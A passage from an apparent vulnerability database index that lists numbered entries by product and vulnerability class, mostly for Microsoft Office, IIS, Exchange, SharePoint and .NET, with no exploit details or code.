SP2/2013 SP1 information disclosure [98089] Microsoft Office Web Apps 2013 SP1 memory corruption [98088] Microsoft SharePoint Server 2007 SP3 memory corruption [98087] Microsoft Office 2007 SP3/2010 SP2 information disclosure [98086] Microsoft Office 2007 SP3/2010 SP2/2013 RT SP1/2013 SP1/2016 memory corruption [98085] Microsoft Excel 2007 SP3 memory corruption [98084] Microsoft Word 2007 SP3/2010 SP2/2011 memory corruption [98083] Microsoft Word 2007 SP3/2010 SP2/2011 memory corruption [98082] Microsoft Office 2010 SP2/2013 RT SP1/2013 SP1/2016 privilege escalation [98081] Microsoft Excel up to 2016 information disclosure [98080] Microsoft Excel 2010 SP2/2013 RT SP1/2013 SP1/2016 memory corruption [98079] Microsoft Word 2016 memory corruption [98078] Microsoft Word/Excel 2007 SP3 memory corruption [98076] Microsoft Lync/Skype for Business 2010/2013/2016 Graphics Component memory corruption [98075] Microsoft Lync/Skype for Business 2010/2013/2016 GDI+ information disclosure [98074] Microsoft Lync/Skype for Business 2010/2013/2016 GDI+ information disclosure [98073] Microsoft Office 2010 SP2/Word Viewer Graphics Component privilege escalation [98072] Microsoft Office 2007 SP3/2010 SP2/Word Viewer Graphics Component memory corruption [98071] Microsoft Office 2007 SP3/2010 SP2/Word Viewer GDI+ information disclosure [98070] Microsoft Office 2007 SP3/2010 SP2/Word Viewer GDI+ information disclosure [97894] Cerberus FTP Server 8.0.10.1 on Windows Header privilege escalation [96363] MyBB/MyBB Merge System up to 1.8.7 on Windows ACP Backup information disclosure [96360] MyBB/MyBB Merge System up to 1.8.7 on Windows Style Import File privilege escalation [95957] Apple iCloud up to 6.1.0 on Windows WebKit memory corruption [95956] Apple iCloud up to 6.1.0 on Windows WebKit memory corruption [95955] Apple iCloud up to 6.1.0 on Windows WebKit memory corruption [95954] Apple iCloud up to 6.1.0 on Windows WebKit memory corruption [95781] Microsoft PowerPoint 2016 Java Embedded Object privilege escalation [95339] GStreamer up to 1.10.1 windows_icon_typefind information disclosure [95334] ntpd up to 4.2.8p8 on Windows UDP Packet denial of service [95125] Microsoft Word/SharePoint Enterprise Server 2016 Document memory corruption [94460] Microsoft .NET Framework up to <=2.0 weak encryption [94452] Microsoft Office on Mac privilege escalation [94451] Microsoft Office 2011 memory corruption [94450] Microsoft Office 2007 SP3/2010 SP2/2011 memory corruption [94449] Microsoft Office 2007 SP3/2010 SP2/2011/2013 SP1 information disclosure [94448] Microsoft Office 2007 SP3/2010 SP2/2011/2013 SP1 information disclosure [94447] Microsoft Office 2010 SP2 memory corruption [94446] Microsoft Office 2016 memory corruption [94445] Microsoft Office 2007 SP3/2010 SP2/2013 RT SP1/2013 SP1 information disclosure [94444] Microsoft Office 2010 SP2/2013 RT SP1/2013 SP1/2016 OLE DLL Loader Data Processing Error [94443] Microsoft Office up to 2016 information disclosure [94442] Microsoft Office 2010 SP2/2013 RT SP1/2013 SP1/2016 privilege escalation [94441] Microsoft Office 2007 SP3/2010 SP2/2013 RT SP1/2013 SP1/2016 privilege escalation [94440] Microsoft Office 2007 SP3/2010 SP2/2013 RT SP1/2013 SP1/2016 information disclosure [94439] Microsoft Office 2007 SP3/2011 information disclosure [94438] Microsoft Office 2007 SP3/2010 SP2/2013 RT SP1/2013 SP1/2016 privilege escalation [94341] Apple iCloud up to 6.0 on Windows Windows Security Memory information disclosure [94340] Apple iCloud up to 6.0 on Windows WebKit State memory corruption [94339] Apple iCloud up to 6.0 on Windows WebKit information disclosure [94338] Apple iCloud up to 6.0 on Windows WebKit information disclosure [94337] Apple iCloud up to 6.0 on Windows WebKit Javascript unknown vulnerability [94336] Apple iCloud up to 6.0 on Windows WebKit State memory corruption [94335] Apple iCloud up to 6.0 on Windows WebKit State memory corruption [94334] Apple iCloud up to 6.0 on Windows WebKit State memory corruption [94333] Apple iCloud up to 6.0 on Windows WebKit State memory corruption [94332] Apple iCloud up to 6.0 on Windows WebKit State memory corruption [94331] Apple iCloud up to 6.0 on Windows WebKit State memory corruption [94330] Apple iCloud up to 6.0 on Windows WebKit State memory corruption [94329] Apple iCloud up to 6.0 on Windows WebKit State memory corruption [94328] Apple iCloud up to 6.0 on Windows WebKit State memory corruption [94327] Apple iCloud up to 6.0 on Windows WebKit State memory corruption [94326] Apple iCloud up to 6.0 on Windows WebKit State memory corruption [94325] Apple iCloud up to 6.0 on Windows WebKit State memory corruption [94324] Apple iCloud up to 6.0 on Windows WebKit State memory corruption [94323] Apple iCloud up to 6.0 on Windows WebKit State information disclosure [94322] Apple iCloud up to 6.0 on Windows WebKit memory corruption [94321] Apple iCloud up to 6.0 on Windows WebKit State memory corruption [94320] Apple iCloud up to 6.0 on Windows WebKit memory corruption [94319] Apple iCloud up to 6.0 on Windows WebKit memory corruption [94318] Apple iCloud up to 6.0 on Windows WebKit memory corruption [93543] Microsoft SQL Server 2016 FILESTREAM Path information disclosure [93542] Microsoft Office 2007 SP3/2010 SP2/2013 RT SP1/2013 SP1 memory corruption [93541] Microsoft Office 2007 SP3 privilege escalation [93540] Microsoft Excel 2010 SP2/2011/2016 memory corruption [93539] Microsoft Office 2007/2010 SP2/2011 memory corruption [93538] Microsoft Office 2007/2010 SP2/2011/2013 SP1 memory corruption [93537] Microsoft Office 2007/2010 SP2/2011 information disclosure [93416] Microsoft SQL Server 2014 SP2/2016/up to 2012 SP3 Server Agent atxcore.dll privilege escalation [93415] Microsoft SQL Server 2016 MDS API cross site scripting [93414] Microsoft SQL Server up to 2012 SP3 RDBMS Engine privilege escalation [93413] Microsoft SQL Server 2016/up to 2014 SP2 RDBMS Engine privilege escalation [93412] Microsoft SQL Server 2016 RDBMS Engine privilege escalation [93396] Microsoft Office 2007/2010/2011 memory corruption [93395] Microsoft Office 2007/2010/2011 memory corruption [93394] Microsoft Office 2007/2010 memory corruption [93393] Microsoft Office up to 2016 memory corruption [93392] Microsoft Office up to 2016 memory corruption [93391] Microsoft Office up to 2016 memory corruption [93147] Apple iCloud up to 6.0 on Windows WebKit memory corruption [93146] Apple iCloud up to 6.0 on Windows WebKit User information disclosure [92584] Microsoft Office up to 2016 memory corruption [92249] Microsoft Azure Active Directory Passport up to 1.4.5/2.0.0 weak authentication [91703] Symantec Mail Security for Microsoft Exchange up to 6.5.8/7.0.4/7.5.4 RAR Decompression memory corruption [91702] Symantec Mail Security for Microsoft Exchange up to 6.5.8/7.0.4/7.5.4 RAR Decompression information disclosure [91614] VMware Workstation/Player on Windows JPEG2000 Image memory corruption [91613] VMware Workstation/Player on Windows TrueType Font memory corruption [91612] VMware Workstation/Player on Windows Cortado ThinPrint tpview.dll memory corruption [91611] VMware Workstation/Player on Windows Cortado ThinPrint memory corruption [91556] Microsoft Exchange 2016 Meeting Invation cross site scripting [91555] Microsoft Exchange 2013/2016 Link privilege escalation [91554] Microsoft Exchange 2007/2010/2013/2016 Email information disclosure [91553] Microsoft Office 2007/2010/2013/2013 RT/2016 memory corruption [91552] Microsoft Office 2007/2010/2013/2013 RT/2016 privilege escalation [91551] Microsoft Office 2007/2010/2013/2013 RT/2016 memory corruption [91550] Microsoft Office 2016 memory corruption [91549] Microsoft Office 2007/2010/2013/2013 RT/2016 memory corruption [91548] Microsoft Office 2007/2010/2013/2013 RT/2016 memory corruption [91547] Microsoft Office 2010 memory corruption [91546] Microsoft Office 2007/2010/2013/2013 RT memory corruption [91545] Microsoft Office 2007/2010 memory corruption [91544] Microsoft Office 2007/2010/2013/2013 RT/2016 memory corruption [91543] Microsoft Office up to 2016 memory corruption [91542] Microsoft Office 2007/2010/2013/2013 RT/2016 information disclosure [91541] Microsoft Office 2013/2016 APP-V 7PK Security Features [90706] Microsoft Office 2007/2010/2013/2013 RT Graphics memory corruption [90705] Microsoft Office 2007/2010/2011 memory corruption [90704] Microsoft Office 2013/2013 RT/2016 memory corruption [90703] Microsoft Office 2007/2010/2013/2013 RT/2016 memory corruption [90249] Microsoft Exchange Outlook Web Access privilege escalation [90169] Microsoft IIS PUT Request privilege escalation [89653] Microsoft IIS /cgi-bin/ Directory information disclosure [89597] Microsoft IIS 5.0 Download.Ject Trojan privilege escalation [89581] Microsoft ISA Server information disclosure [89568] Microsoft IIS ASP.NET information disclosure [89524] Microsoft ISA Server SSL Packet denial of service [89487] Microsoft Exchange information disclosure [89349] Microsoft IIS Passive FTP Connection information disclosure [89298] Microsoft SQL Server Version information disclosure [89286] Microsoft MSN Messenger IP Address information disclosure [89220] Microsoft IIS on WinNT4 IDC File Path information disclosure [89195] KpyM Windows Telnet Server privilege escalation [89179] Jordan Windows Telnet 1.0/1.2 memory corruption [89043] Microsoft Office up to 2016 memory corruption [89042] Microsoft Word Viewer memory corruption [89041] Microsoft Office up to 2016 memory corruption [89040] Microsoft Office 2010 SP2/2011/2013 RT SP1/2013 SP1/2016 memory corruption [89039] Microsoft Office 2007 SP3/2010 SP2/2011/2013 RT SP1/2013 SP1 memory corruption [89038] Microsoft Office 2010 SP2/2013 RT SP1/2013 SP1/2016 Security Feature 7PK Security Features [89037] Microsoft Office 2010 SP2/2013 RT SP1/2013 SP1/2016 memory corruption [88885] Microsoft Office 2000 SP1 Service Pack 2 privilege escalation [88829] Symantec Norton Antivirus on Windows Client IDS Driver memory corruption [88828] Symantec Endpoint Protection on Windows Client IDS Driver memory corruption [88761] Microsoft IIS privilege escalation [88654] Microsoft IIS 4.0 Remote Administration Script privilege escalation [88653] Microsoft Exchange 5.0/5.5 IMAP Service weak authentication [88616] Microsoft IIS privilege escalation [88583] Microsoft IIS 2.0/2.5 URLScan information disclosure [88289] Microsoft IIS Sample Files information disclosure [88260] Microsoft IIS bdir.htr information disclosure [88256] Microsoft SQL Server weak authentication [88254] Microsoft IIS 5.0 IDC File cross site scripting [88247] Microsoft IIS 5.0 Sample Application Form_JScript.asp cross site scripting [88243] Microsoft IIS /scripts/repost.asp File privilege escalation [88241] Microsoft IIS 5.0 Sample Application /iissamples Path information disclosure [88143] Microsoft Outlook S/MIME EmailAddress weak authentication [87956] Microsoft Exchange 2013/2016 Oracle Outside In Libraries information disclosure [87955] Microsoft Exchange 2007/2010/2013/2016 Oracle Outside In Libraries privilege escalation [87954] Microsoft Exchange 2007/2010/2013/2016 Oracle Outside In Libraries privilege escalation [87953] Microsoft Exchange 2007/2010/2013/2016 Oracle Outside In Libraries privilege escalation [87939] Microsoft Office 2007 SP3/2010 SP2/2013 RT SP1/2013 SP1/2016 OLE DLL privilege escalation [87938] Microsoft Office 2007 SP3/2010 SP2/2011 information disclosure [87937] Microsoft Office 2007 SP3/2010 SP2/2011 memory corruption [87936] Microsoft Office up to 2016 privilege escalation [87626] VMware vCenter Server up to 5.1/5.5/6.0 on Windows cross site scripting [87541] VMware Workstation/Player on Windows privilege escalation [87168] Microsoft .NET Framework up to 4.6.1 TLS/SSL information disclosure [87149] Microsoft Office up to 2016 memory corruption [87148] Microsoft Office 2010 Graphics privilege escalation [87147] Microsoft Office 2007/2010 memory corruption [87146] Microsoft Office 2011/2013/2013 RT/2016 memory corruption [84364] Microsoft PowerPoint 2000/2002/2003 mso.dll memory corruption [84255] Microsoft Office privilege escalation [83849] Microsoft Office privilege escalation [82354] Microsoft IIS WebDAV denial of service [82229] Microsoft Excel 2010 SP2 Office Document memory corruption [82228] Microsoft Excel 2007 SP3/2010 SP2 Office Document memory corruption [82225] Microsoft Word 2007 SP3/2010 SP2/2013 RT SP1/2013 SP1 Office Document memory corruption [82224] Microsoft Excel 2007 SP3/2010 SP2/2013 RT SP1/2013 SP1/2016 Office Document memory corruption [81890] Microsoft IIS advsearch.asp denial of service [81889] Microsoft IIS query.asp denial of service [81888] Microsoft IIS search.asp denial of service [81769] Microsoft IIS 4.0/5.0 cmd.exe privilege escalation [81731] Microsoft IIS ASP.NET Path information disclosure [81558] Red Hat WildFly up to 10.0.0 on Windows Blacklist Filter File information disclosure [81274] Microsoft Office up to 2016 memory corruption [81273] Microsoft Office 2007/2010/2013/2016 privilege escalation [81272] Microsoft Office 2007/2010/2013 memory corruption [80886] Microsoft SharePoint Foundation 2013 SP1 cross site scripting [80872] Microsoft Office 2007 SP3/2010 SP2/2013 RT SP1/2013 SP1/2016 memory corruption [80871] Microsoft Office 2007 SP3/2010 SP2/2013 RT SP1/2013 SP1/2016 memory corruption [80870] Microsoft Office up to 2016 memory corruption [80869] Microsoft Office 2007 SP3/2010 SP2/2013 RT SP1/2013 SP1/2016 memory corruption [80868] Microsoft Office up to 2016 memory corruption [80867] Microsoft Office up to 2016 memory corruption [80826] Oracle Java SE 6u111/7u95/8u71/8u72 on Windows Install privilege escalation [80733] cURL up to 7.46.x on Windows privilege escalation [80231] Microsoft Excel up to 2016 Office Document memory corruption [80229] Microsoft Exchange Server 2013 CU 10/2013 CU 11/2013 SP1/2016 Outlook Web Access cross site scripting [80228] Microsoft Exchange Server 2016 Outlook Web Access cross site scripting [80227] Microsoft Exchange Server 2013 CU 10/2013 SP1/2016 Outlook Web Access cross site scripting [80226] Microsoft Exchange Server 2016 Outlook Web Access cross site scripting [80218] Microsoft Office up to 2016 ASLR information disclosure [80217] Microsoft SharePoint Foundation 2013 SP1 Access Control Policy cross site scripting [80216] Microsoft Office up to 2016 Office Document memory corruption [80206] Microsoft SharePoint Foundation 2013 SP1 Access Control Policy cross site scripting [79863] Samba up to 4.3.2 Windows Active Directory Server privilege escalation [79745] Microsoft Office Font File memory corruption [79744] Microsoft Office Font File memory corruption [79743] Microsoft Office Font File memory corruption [79742] Microsoft Skype Font File memory corruption [79741] Microsoft Skype Font File memory corruption [79740] Microsoft Skype Font File memory corruption [79739] Microsoft .NET Framework up to 4.6 Font File memory corruption [79505] Microsoft Office 2007 memory corruption [79504] Microsoft Office 2007/2010/2013/2016 privilege escalation [79503] Microsoft Office 2007/2010/2013 memory corruption [79502] Microsoft Office 2007/2010/2011 memory corruption [79501] Microsoft Office 2007/2010 memory corruption [79500] Microsoft Office 2010/2011/2016 memory corruption [79190] Microsoft Word 2007 SP3/2010 SP2/2013 RT SP1/2013 SP1/2016 Office Document memory corruption [79189] Microsoft Office 2007 SP3/2010 SP2/2013 RT SP1/2013 SP1/2016 Office Document memory corruption [79187] Microsoft Office 2007 SP3/2010 SP2/2013 SP1/2016 Sandbox privilege escalation [79186] Microsoft Lync/Skype for Business cross site scripting [79181] Microsoft .NET Framework up to 4.6 ASLR information disclosure [79180] Microsoft .NET Framework up to 4.6 cross site scripting [79179] Microsoft .NET Framework up to 4.6 information disclosure [79177] Microsoft Office/SharePoint memory corruption [79176] Microsoft Office/SharePoint memory corruption [79175] Microsoft Office/SharePoint memory corruption [79117] Microsoft Outlook 2011/2016 on Mac HTML cross site scripting [78706] ownCloud Server up to 7.0.5/8.0.3 on Windows routing directory traversal [78375] Microsoft SharePoint Server/SharePoint Foundation 2013 SP1 cross site scripting [78374] Microsoft SharePoint Server/Office Web Apps cross site scripting [78373] Microsoft Excel/SharePoint Server fileVersion memory corruption [78371] Microsoft SharePoint Server 2007 SP3/2010 SP2 InfoPath Forms Services information disclosure [78370] Microsoft Excel/SharePoint Server Object calculatedColumnFormula memory corruption [77710] PHP up to 5.6.12 on Windows CLI Server memory corruption [77702] Corel WordPerfect Microsoft Word Document Conversion memory corruption [77646] Microsoft Office 2007 SP3/2010 SP2/2013 RT SP1/2013 SP1 EPS Image privilege escalation [77645] Microsoft Exchange Server 2013 CU8/2013 CU9 Outlook Web Access cross site scripting [77644] Microsoft Exchange Server 2013 CU8/2013 CU9 Outlook Web Access cross site scripting [77641] Microsoft Lync Server/Skype for Business Server cross site scripting [77638] Microsoft Lync Server 2013 cross site scripting [77637] Microsoft Lync Server/Skype for Business Server cross site scripting [77632] Microsoft .NET Framework up to 4.6 MVC Code [77629] Microsoft Excel 2007 SP3/2010 SP2/2011/2016 Office Document memory corruption [77628] Microsoft SharePoint Foundation 2013 SP1 cross site scripting [77627] Microsoft Excel 2007 SP3/2010 SP2 Office Document memory corruption [77626] Microsoft Excel 2007 SP3/2010 SP2/2011/2016 Office Document memory corruption [77617] Microsoft Office 2007 SP3/2010 SP2 OpenType Font memory corruption [77612] Microsoft Exchange Server 2013 CU8/2013 CU9 Outlook Web Access information disclosure [77611] Microsoft .NET Framework up to 4.6 Array Copy memory corruption [77331] Apache ActiveMQ up to 5.11.1 on Windows Fileserver Upload/Download directory traversal [77252] Microsoft Office 2007 SP3/2010 SP2 Office Graphics Library Font privilege escalation [77053] Microsoft .NET Framework 4.6 RyuJIT Optimization privilege escalation [77052] Microsoft .NET Framework 4.6 RyuJIT Optimization privilege escalation [77051] Microsoft .NET Framework 4.6 RyuJIT Optimization privilege escalation [77050] Microsoft Office up to 2016 memory corruption [77049] Microsoft Office up to Word Viewer Numeric Error [77048] Microsoft Office up to Word Viewer memory corruption [77047] Microsoft Office up to Word Viewer memory corruption [77046] Microsoft Office up to Word Viewer memory corruption [77045] Microsoft Office up to Word Viewer privilege escalation [77044] Microsoft Office up to Word Viewer Command Line Parameter information disclosure [77043] Microsoft Office up to Word Viewer memory corruption [76497] Microsoft PowerPoint 2007 SP3/2010 SP2/2013 SP1 Office Document memory corruption [76491] Microsoft Excel 2007 SP3/2010 SP2/2013 RT SP1/2013 SP1 Office Document memory corruption [76467] Microsoft Word 2007 SP3/2010 SP2/2011/2013 RT SP1/2013 SP1 Office Document memory corruption [76466] Microsoft Word 2007 SP3/2010 SP2/2011/2013 RT SP1/2013 SP1 Office Document memory corruption [76464] Microsoft Excel 2007 SP3/2010 SP2/2013 RT SP1/2013 SP1 Office Document memory corruption [76463] Microsoft Excel 2007 SP3/2010 SP2/2011/2013 RT SP1/2013 SP1 Office Document memory corruption [76462] Microsoft Excel/SharePoint Server ASLR information disclosure [76440] Microsoft SQL Server 2008/2008 R2/2012/2014 Virtual Function privilege escalation [76439] Microsoft SQL Server 2008/2008 R2/2012/2014 privilege escalation [76438] Microsoft SQL Server 2008/2008 R2/2012/2014 Pointer Casting privilege escalation [76399] VMware Workstation/Player/Horizon View Client on Windows Discretionary Access Control List privilege escalation [75793] Microsoft Exchange Server 2013 CU8 cross site scripting [75792] Microsoft Exchange Server 2013 SP1 CU8 cross site request forgery [75791] Microsoft Office 2013 SP1 Office Document Data Processing Error [75787] Microsoft Exchange Server 2013 SP1 CU8 Same Origin Policy privilege escalation [75786] Microsoft Office 2010 SP2/2013 RT SP1/2013 SP1 Office Document Data Processing Error [75785] Microsoft Office Compatibility Pack SP3 Office Document Data Processing Error [75707] Cisco Unified MeetingPlace for Microsoft Outlook 8.6(1.2)/ 8.6(1.9) cross site scripting [75685] Skype on Windows/Android/iOS IM denial of service [75399] Trend Micro ScanMail for Microsoft Exchange up to 10.2/11.0 Session ID Generator weak encryption [75340] Microsoft .NET Framework up to 4.5.2 WinForms privilege escalation [75339] Microsoft .NET Framework up to 4.5.2 XML weak encryption [75338] Microsoft SharePoint 2007/2010/2013 Content privilege escalation [75337] Microsoft Office 2007 SP3/2010 SP2/2011/2013 RT SP1/2013 SP1 memory corruption [75336] Microsoft Office 2007 SP3/2010 SP2/2011/2013 RT SP1/2013 SP1 memory corruption [74848] Microsoft SharePoint Foundation/SharePoint Server 2013 SP1 cross site scripting [74846] Microsoft Word/Word Viewer/Office Compatibility Pack Document memory corruption [74845] Microsoft Office 2007/2010/2013 Document memory corruption [74844] Microsoft Office 2007/2010 Document memory corruption [74843] Microsoft .NET Framework up to 4.5.2 ASP.NET Data Processing Error [74837] Microsoft Office 2007/2010/2011/2013 RTF Document denial of service [74836] Microsoft Project Server 2010 SP2/2013 SP1 cross site scripting [74835] Microsoft Office 2011 on Mac cross site scripting [74393] Microsoft SharePoint Server 2013 Foundation cross site scripting [74016] Microsoft .NET Framework 4.03 PML File memory corruption [73979] Microsoft Exchange Server 2003 CU7/2003 SP1 Meeting privilege escalation [73978] Microsoft Exchange Server 2003 CU7/2003 SP1 cross site scripting [73977] Microsoft Exchange Server 2003 CU7/2003 SP1 cross site scripting [73976] Microsoft Exchange Server 2003 CU7/2003 SP1 cross site scripting [73975] Microsoft Exchange Server 2003 CU7/2003 SP1 cross site scripting [73967] Microsoft Office up to 2013 SP1 Office File Data Processing Error [73966] Microsoft Office up to 2013 SP1 RTF File denial of service [73965] Microsoft Office up to 2013 SP1 memory corruption [73964] Microsoft SharePoint 2007/2010/2013 cross site scripting [73200] Microsoft Exchange Server cross site scripting [73199] Microsoft Exchange Server cross site scripting [71337] Microsoft Office 2000/2004/XP privilege escalation [71152] clearhub Windows Live Hotmail PUSH mail 1.00.97 X.509 Certificate weak encryption [70617] Microsoft Outlook.com Certificates weak encryption [69467] Microsoft IIS 4.0/5.0/5.06/5.1 privilege escalation [69158] Microsoft Office 2007/2010/2013 memory corruption [69157] Microsoft Office 2007/2010/2013 OneTableDocumentStream denial of service [69156] Microsoft Office 2010 Object denial of service [69155] Microsoft Excel -/2007/2010/2013 Object denial of service [62914] Microsoft Office 2003 SP3/2007 SP3/2008/2010 SP1/2011 Spreadsheet denial of service [62238] Microsoft Visual Studio Team Foundation Server 2010 cross site scripting [61434] nginx 1.2.0/1.3.0 on Windows Access Restriction privilege escalation [60711] Microsoft .NET Framework 4.0 denial of service [60205] Microsoft .NET Framework 2.0 SP2/3.5.1 privilege escalation [59908] Microsoft Anti-cross Site Scripting Library 3.1 cross site scripting [58992] Microsoft .NET Framework 1.0 SP3/1.1 SP1/2.0 SP2/3.5.1/4 privilege escalation [58492] Microsoft SharePoint Server 2007 Spreadsheet memory corruption [58491] Microsoft Office 2004/2007/2008/2010/2011 Spreadsheet privilege escalation [58490] Microsoft Office Compatibility Pack 2007 Spreadsheet memory corruption [58489] Microsoft Office 2004/2007/2008/2010/2011 Spreadsheet memory corruption [58488] Microsoft Office 2007/2010 privilege escalation [58487] Microsoft SharePoint Foundation 2010 cross site scripting [58486] Microsoft SharePoint Foundation 2010 Reflected cross site scripting [58485] Microsoft SharePoint Foundation 2010 EditForm.aspx cross site scripting [58239] Microsoft Visual Studio cross site scripting [57691] Microsoft SQL Server 2008 Web Service information disclosure [57690] Microsoft Excel 2002/2003 Spreadsheet memory corruption [57689] Microsoft Excel 2002 Spreadsheet memory corruption [57688] Microsoft Excel 2002 Spreadsheet memory corruption [57687] Microsoft Excel 2002/2003/2007 Spreadsheet memory corruption [57686] Microsoft Excel 2002 Spreadsheet memory corruption [57685] Microsoft Excel 2002/2003/2007 Array Access memory corruption [57684] Microsoft Excel 2002/2003/2007/2010 Spreadsheet memory corruption [57420] Microsoft PowerPoint 2002/2003 memory corruption [57410] Microsoft .NET Framework 3.5 SP1/3.5.1/4.0 Access Restriction privilege escalation [57278] Wireshark 1.4.0/1.4.1/1.4.2/1.4.3/1.4.4 on Windows NFS Dissector Numeric Error [57079] Microsoft PowerPoint 2002/2003/2007/2010 privilege escalation [57078] Microsoft Office 2003/2007/Xp docx unknown vulnerability [57077] Microsoft Excel 2002 memory corruption [57076] Microsoft Excel 2002/2003 memory corruption [57075] Microsoft Excel 2002/2003 memory corruption [57074] Microsoft Excel 2002 memory corruption [57073] Microsoft Excel 2002/2003/2007/2010 Numeric Error [57072] Microsoft Excel -/2002/2003/2007/2010 Numeric Error [56475] Microsoft Office 2004/2008 privilege escalation [56474] Microsoft Office Compatibility Pack Spreadsheet privilege escalation [56473] Microsoft Office Compatibility Pack memory corruption [55770] Microsoft Office Xp memory corruption [55769] Microsoft Office Xp memory corruption [55768] Microsoft Office Xp memory corruption [55767] Microsoft Office Xp memory corruption [55766] Microsoft Office Xp memory corruption [55765] Microsoft Office 2003/Xp Numeric Error [55764] Microsoft Office 2003/Xp memory corruption [55420] Microsoft Office 2007/2010 memory corruption [55419] Microsoft Office 2004/2008/2011/Xp memory corruption [55418] Microsoft Office up to Xp memory corruption [55417] Microsoft Office up to Xp memory corruption [55416] Microsoft Office up to Xp memory corruption [55412] Microsoft PowerPoint Viewer 2007 Numeric Error [55411] Microsoft PowerPoint 2002/2003 memory corruption [54995] Microsoft Office 2004/2008 privilege escalation [54994] Microsoft Office 2004/2008 privilege escalation [54993] Microsoft Office Compatibility Pack 2007 privilege escalation [54992] Microsoft Excel 2002 privilege escalation [54991] Microsoft Office 2004 Future privilege escalation [54990] Microsoft Office 2004 privilege escalation [54989] Microsoft Office 2004/2008 privilege escalation [54988] Microsoft Excel 2002 privilege escalation [54987] Microsoft Excel 2002 privilege escalation [54986] Microsoft Excel 2002/2003 privilege escalation [54985] Microsoft Office Compatibility Pack 2003/2004/2007/2008 privilege escalation [54984] Microsoft Office 2004/2008 privilege escalation [54983] Microsoft Excel 2002 Numeric Error [54980] Microsoft Word 2002/2003 privilege escalation [54979] Microsoft Word 2002 privilege escalation [54978] Microsoft Word 2002 privilege escalation [54977] Microsoft Word 2002 privilege escalation [54976] Microsoft Word 2002 denial of service [54975] Microsoft Word 2002 privilege escalation [54974] Microsoft Word 2002 privilege escalation [54973] Microsoft Word 2002 privilege escalation [54972] Microsoft Word 2002 privilege escalation [54971] Microsoft Word 2002 privilege escalation [54774] Microsoft Word 2003 word_crash_11.8326.8324_poc.doc denial of service [54757] Microsoft SharePoint Server 2007 HTML Sanitization SafeHTML cross site scripting [54719] Microsoft IIS 5.1 Access Restriction weak authentication [54617] Microsoft Outlook Web Access up to 2007 cross site request forgery [54550] Microsoft PowerPoint 2007 rpawinet.dll privilege escalation [54549] Microsoft PowerPoint 2010 pptimpconv.dll memory corruption [54322] Microsoft Word 2002/2003 privilege escalation [54321] Microsoft Office Compatibility Pack 2007 memory corruption [54320] Microsoft Office Compatibility Pack 2007 privilege escalation [54319] Microsoft Office Compatibility Pack 2007 privilege escalation [54318] Microsoft .NET Framework 2.0 SP1/2.0 SP2/3.5/3.5 SP1/3.5.1 Interfaces privilege escalation [54083] Microsoft Access 2003 ActiveX Control ACCWIZ.dll privilege escalation [53508] Microsoft SharePoint Services 3.0 denial of service [53507] Microsoft IIS 6.0/7.0/7.5 privilege escalation [53505] Microsoft Excel 2002/2007 privilege escalation [53504] Microsoft Excel 2002 privilege escalation [53503] Microsoft Excel 2002 privilege escalation [53502] Microsoft Excel 2002 privilege escalation [53501] Microsoft Excel 2002 privilege escalation [53500] Microsoft Excel 2002 privilege escalation [53499] Microsoft Excel 2002 privilege escalation [53498] Microsoft Excel 2002 privilege escalation [53497] Microsoft Excel 2002 privilege escalation [53496] Microsoft Excel 2002 privilege escalation [53495] Microsoft Excel 2002/2003/2007 privilege escalation [53494] Microsoft Excel 2002 privilege escalation [53493] Microsoft Excel 2002/2003/2007 privilege escalation [53385] Microsoft Exchange Server 2007 Outlook Web Access cross site scripting [53367] Microsoft .NET Framework 1.0 Default Configuration cross site scripting [53164] Microsoft Office 2003/2007/Xp ActiveX Control VBE6.DLL privilege escalation [52430] Microsoft Wireless Keyboard Encryption XOR weak encryption [52148] Microsoft Office 2004/2007/2008 privilege escalation [52147] Microsoft Office 2004/2007/2008 Spreadsheet privilege escalation [52146] Microsoft Office 2004/2007/2008 Spreadsheet memory corruption [52145] Microsoft Office 2004/2007/2008 Spreadsheet privilege escalation [52144] Microsoft Office 2004/2007/2008 Spreadsheet privilege escalation [52143] Microsoft Office 2004/2007/2008 Spreadsheet privilege escalation [51995] Microsoft SharePoint Server up to 2006 cross site scripting [51810] Microsoft Office 2004/Xp MSO.DLL memory corruption [51802] Microsoft PowerPoint 2003 memory corruption [51801] Microsoft PowerPoint 2003 memory corruption [51800] Microsoft PowerPoint 2002/2003 privilege escalation [51799] Microsoft PowerPoint 2002/2003 privilege escalation [51798] Microsoft PowerPoint 2002/2003 memory corruption [51758] Microsoft IIS 6.0 cross site scripting [51338] Microsoft IIS up to 6.0 asp:.jpg privilege escalation [51074] Microsoft Office 2002/2003 Numeric Error [50812] Citrix Online Plug-in up to 11.0 on Windows weak encryption [50794] Microsoft Office 2004/2008 Spreadsheet privilege escalation [50793] Microsoft Office 2004/2008 Spreadsheet privilege escalation [50792] Microsoft Office 2004/2008 Spreadsheet privilege escalation [50791] Microsoft Office 2004/2008 Spreadsheet privilege escalation [50790] Microsoft Office 2004/2008 Spreadsheet memory corruption [50789] Microsoft Office 2004/2008 Spreadsheet privilege escalation [50788] Microsoft Office 2004/2008 Spreadsheet privilege escalation [50787] Microsoft Office 2004/2008 Spreadsheet privilege escalation [50660] Microsoft SharePoint Server 2007 privilege escalation [50443] Microsoft PowerPoint 2007 Numeric Error [50437] Microsoft .NET Framework 1.1 SP1/2.0 SP2 GDI+ Numeric Error [50432] Microsoft .NET Framework 2.0/2.0 SP1/2.0 SP2/3.5/3.5 SP1 privilege escalation [50155] PHP on Windows C Runtime _fdopen Format String [50139] Microsoft Enterprise Library 4.0 Format String [49699] Sophos PureMessage for Microsoft Exchange Installation denial of service [49698] Sophos PureMessage for Microsoft Exchange EdgeTransport.exe denial of service [49697] Sophos PureMessage for Microsoft Exchange Message Queue PMScanner.exe denial of service [49395] Microsoft Office 2000/2003/XP Office Web Components memory corruption [49390] Microsoft Office 2000/2003/XP Office Web Components memory corruption [49389] Microsoft Office 2000/2003/XP Office Web Components denial of service [49272] XEmacs 21.4.22 on Windows glyphs-eimage.c jpeg_instantiate Numeric Error [49198] Microsoft Visual Studio 2005 information disclosure [49191] Microsoft Visual Studio Error privilege escalation [49044] Microsoft ISA Server 2006 privilege escalation [48572] Microsoft PowerPoint 2002 FL21WIN.DLL privilege escalation [48554] Microsoft Excel 2000/2003/2007 privilege escalation [48549] Microsoft IIS 5.0 weak authentication [48548] Microsoft Office up to Xp Numeric Error [48547] Microsoft Office up to Xp denial of service [48546] Microsoft Office up to Xp privilege escalation [48545] Microsoft Office up to Xp privilege escalation [48544] Microsoft Office up to Xp privilege escalation [48543] Microsoft Office up to Xp privilege escalation [48518] Microsoft ADAM XP Active Directory denial of service [48515] Microsoft Office Word Viewer 2003 memory corruption [48514] Microsoft Office 